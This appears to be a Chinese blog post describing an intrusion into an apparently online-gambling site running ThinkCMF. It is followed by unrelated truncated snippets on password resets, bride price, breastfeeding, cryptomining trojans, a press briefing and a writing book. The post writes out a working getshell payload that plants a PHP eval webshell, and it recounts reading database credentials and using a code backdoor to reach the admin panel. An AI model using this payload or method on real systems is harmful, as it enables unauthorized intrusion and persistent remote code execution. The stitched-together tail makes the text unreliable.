记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程
拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。
进去之后在url处构造报错
查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" *** *** 521"]);?>')</php>
写入shell之后连接蚁剑,直接拿下
鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!
一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。
正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。
这。。。这TM。。。有人在代码里下毒。
拿着不知道是哪位好心人留下的后门,含泪登录了后台。
帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。
划重点: 重置电脑开机密码一共分成三个流程「 制做PE系统软件」「进到PE系统软件 」「密码重置 」;本方式是协助客户重设自身的电脑上开机密码,切勿用以其他非法途径!!! 开机重置密码方式以下:...
我们中国人完婚,除开注重门不当户不对以外,还注重“诚心满满的”。当然,除开2个新手中间的情感以外,我国从古至今的传统式“彩礼钱”也十分关键。 日常生活常常见到,由于彩礼钱建议不和而一拍两散的新...
亲喂母乳时,新生儿的奶量需多少?或喂奶方式如何做,才能让妈咪喂奶不疲累、宝宝也能充分吸收?透过本篇章让妈咪在哺喂路上更得心应手。其实只要细心的观察,就能发现宝宝的习惯了哦,下面友谊长存的小编为大家分享...
然后装置2月2019年,云服务器或许会遇到大费事。 其实,云服务器从2018年开端就现已变成了加密钱银挖矿木马的首要进犯方针,尽管加密钱银的价值现已大不如前,但关于违法分子们来说这依然是有利可图的。...
央视网消息:2月12日,外交部举行例行记者会,发言人华春莹主持会议并回答中外记者提问。问:近期有报道称,一些为中国国家安全部门工作的黑客入侵了挪威软件公司,称这是中方发起“云端跳跃”(Cloudhop...
大家好,这里是笑薇读书,今天我将和大家继续共读《写作是最好的自我投资》。在上一节中,我们讲到了写好职场干货文的方法和技巧,今天我将和大家分享最后一节内容:爆款文究竟应该怎么写? 通过今天的阅读...